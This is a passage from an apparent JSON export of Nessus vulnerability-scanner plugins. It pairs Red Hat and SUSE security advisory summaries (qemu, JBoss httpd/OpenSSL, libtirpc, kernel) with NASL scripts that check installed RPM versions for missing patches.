ereg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-rbd-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-rbd-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-x86-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-x86-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"s390x\", reference:\"qemu-s390-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"s390x\", reference:\"qemu-s390-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-block-curl-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-block-curl-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-block-ssh-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-block-ssh-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-debugsource-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-guest-agent-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-guest-agent-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-lang-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-tools-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-tools-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-kvm-2.6.2-41.43.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:42:20", "bulletinFamily": "scanner", "description": "An update is now available for Red Hat JBoss Core Services on RHEL 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Core Services is a set of supplementary software for Red Hat JBoss middleware products. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.\n\nThis release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.23, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* A memory leak flaw was found in the way OpenSSL handled TLS status request extension data during session renegotiation. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-6304)\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack.\n(CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* A timing attack flaw was found in OpenSSL that could allow a malicious user with local access to recover ECDSA P-256 private keys.\n(CVE-2016-7056)\n\n* A denial of service flaw was found in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections from other clients. (CVE-2016-8610)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\n* A vulnerability was found in httpd's handling of the LimitRequestFields directive in mod_http2, affecting servers with HTTP/2 enabled. An attacker could send crafted requests with headers larger than the server's available memory, causing httpd to crash.\n(CVE-2016-8740)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and Shi Lei (Gear Team of Qihoo 360 Inc.) for reporting CVE-2016-8610. Upstream acknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original reporter of CVE-2016-6304.", "modified": "2018-11-10T00:00:00", "id": "REDHAT-RHSA-2017-1413.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=117315", "published": "2018-09-06T00:00:00", "title": "RHEL 7 : JBoss Core Services (RHSA-2017:1413)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1413. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117315);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/11/10 11:49:56\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-6304\", \"CVE-2016-7056\", \"CVE-2016-8610\", \"CVE-2016-8740\", \"CVE-2016-8743\");\n script_xref(name:\"RHSA\", value:\"2017:1413\");\n\n script_name(english:\"RHEL 7 : JBoss Core Services (RHSA-2017:1413)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Core Services on RHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Core Services is a set of supplementary software for Red\nHat JBoss middleware products. This software, such as Apache HTTP\nServer, is common to multiple JBoss middleware products, and is\npackaged under Red Hat JBoss Core Services to allow for faster\ndistribution of updates, and for a more consistent update experience.\n\nThis release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23\nService Pack 1 serves as a replacement for Red Hat JBoss Core Services\nApache HTTP Server 2.4.23, and includes bug fixes, which are\ndocumented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* A memory leak flaw was found in the way OpenSSL handled TLS status\nrequest extension data during session renegotiation. A remote attacker\ncould cause a TLS server using OpenSSL to consume an excessive amount\nof memory and, possibly, exit unexpectedly after exhausting all\navailable memory, if it enabled OCSP stapling support. (CVE-2016-6304)\n\n* It was discovered that the mod_session_crypto module of httpd did\nnot use any mechanisms to verify integrity of the encrypted session\ndata stored in the user's browser. A remote attacker could use this\nflaw to decrypt and modify session data using a padding oracle attack.\n(CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not\nproperly check for memory allocation failures. A remote attacker could\nuse this flaw to cause httpd child processes to repeatedly crash if\nthe server used HTTP digest authentication. (CVE-2016-2161)\n\n* A timing attack flaw was found in OpenSSL that could allow a\nmalicious user with local access to recover ECDSA P-256 private keys.\n(CVE-2016-7056)\n\n* A denial of service flaw was found in the way the TLS/SSL protocol\ndefined processing of ALERT packets during a connection handshake. A\nremote attacker could use this flaw to make a TLS/SSL server consume\nan excessive amount of CPU and fail to accept connections from other\nclients. (CVE-2016-8610)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed\ncertain characters not permitted by the HTTP protocol specification to\nappear unencoded in HTTP request headers. If httpd was used in\nconjunction with a proxy or backend server that interpreted those\ncharacters differently, a remote attacker could possibly use this flaw\nto inject data into HTTP responses, resulting in proxy cache\npoisoning. (CVE-2016-8743)\n\n* A vulnerability was found in httpd's handling of the\nLimitRequestFields directive in mod_http2, affecting servers with\nHTTP/2 enabled. An attacker could send crafted requests with headers\nlarger than the server's available memory, causing httpd to crash.\n(CVE-2016-8740)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2016-6304 and Shi Lei (Gear Team of Qihoo 360 Inc.) for reporting\nCVE-2016-8610. Upstream acknowledges Shi Lei (Gear Team of Qihoo 360\nInc.) as the original reporter of CVE-2016-6304.\"\n );\n # https://access.redhat.com/documentation/en/red-hat-jboss-core-services/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75d9eb14\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:1413\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0736\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-2161\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6304\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-7056\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8610\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8740\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8743\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_security-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1413\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-httpd-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-httpd-debuginfo-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-httpd-devel-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-httpd-libs-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbcs-httpd24-httpd-manual-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-httpd-selinux-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-httpd-tools-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-mod_ldap-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-mod_proxy_html-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-mod_security-2.9.1-19.GA.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-mod_security-debuginfo-2.9.1-19.GA.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-mod_session-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-mod_ssl-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-1.0.2h-13.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-debuginfo-1.0.2h-13.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-devel-1.0.2h-13.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-libs-1.0.2h-13.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-perl-1.0.2h-13.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-static-1.0.2h-13.jbcs.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jbcs-httpd24-httpd / jbcs-httpd24-httpd-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:41:29", "bulletinFamily": "scanner", "description": "This update for libtirpc fixes the following issues: Security issue fixed :\n\n - bsc#968175: Fix remote crash of RPC services. Bug fixes :\n\n - bsc#1072183: Send RPC getport call as specified via parameter.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "SUSE_SU-2018-2171-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111525", "published": "2018-08-03T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : libtirpc (SUSE-SU-2018:2171-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2171-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111525);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/12/01 13:19:05\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : libtirpc (SUSE-SU-2018:2171-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libtirpc fixes the following issues: Security issue\nfixed :\n\n - bsc#968175: Fix remote crash of RPC services. Bug \nfixes :\n\n - bsc#1072183: Send RPC getport call as specified via\n parameter.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1072183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968175\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182171-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ccf5469d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2018-1474=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-1474=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-1474=1\n\nSUSE CaaS Platform ALL :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\n\nSUSE CaaS Platform 3.0 :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtirpc-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtirpc-netconfig\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtirpc3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtirpc3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! ereg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtirpc-debugsource-1.0.1-17.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtirpc-netconfig-1.0.1-17.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtirpc3-1.0.1-17.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtirpc3-debuginfo-1.0.1-17.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtirpc3-32bit-1.0.1-17.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtirpc3-debuginfo-32bit-1.0.1-17.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libtirpc-debugsource-1.0.1-17.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libtirpc-netconfig-1.0.1-17.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libtirpc3-1.0.1-17.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libtirpc3-32bit-1.0.1-17.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libtirpc3-debuginfo-1.0.1-17.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libtirpc3-debuginfo-32bit-1.0.1-17.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libtirpc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T01:40:57", "bulletinFamily": "scanner", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.3 Extended Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639, x86 AMD)\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.\n\nBug Fix(es) :\n\n* When a Nonvolatile Memory Express (NVMe) namespace was created, changed, or deleted, an occasional deadlock occurred. With this update, namespace scanning and removal does not hold a mutual exclusion (mutex) program object. As a result, a deadlock no longer occurs in the described scenario. (BZ#1566886)\n\n* Previously, a live migration of a virtual machine from one host with updated firmware to another host without updated firmware resulted in incorrect kernel settings for Meltdown mitigations, which could leave the kernel vulnerable to Meltdown. With this fix, the firmware on the new physical host is re-scanned for updates after a live migration. As a result, the kernel uses the correct mitigation in the described scenario. (BZ#1570507)\n\n* Previously, microcode updates on 32 and 64-bit AMD and Intel architectures were not synchronized. As a consequence, it was not possible to apply the microcode updates. This fix adds the synchronization to the microcode updates so that processors of the stated architectures receive updates at the same time. As a result, microcode updates are now synchronized. (BZ# 1578044)\n\n* When switching from the indirect branch speculation (IBRS) feature to the retpolines feature, the IBRS state of some CPUs was sometimes not handled correctly. Consequently, some CPUs were left with the IBRS Model-Specific Register (MSR) bit set to 1, which could lead to performance issues. With this update, the underlying source code has been fixed to clear the IBRS MSR bits correctly, thus fixing the bug.\n(BZ#1586146)\n\nUsers of kernel are advised to upgrade to these updated packages, which fix these bugs.\n\nThe system must be rebooted for this update to take effect.", "modified": "2018-11-10T00:00:00", "id": "REDHAT-RHSA-2018-2161.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110999", "published": "2018-07-11T00:00:00", "title": "RHEL 7 : kernel (RHSA-2018:2161) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:2161. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110999);\n script_version(\"1.3\");\n 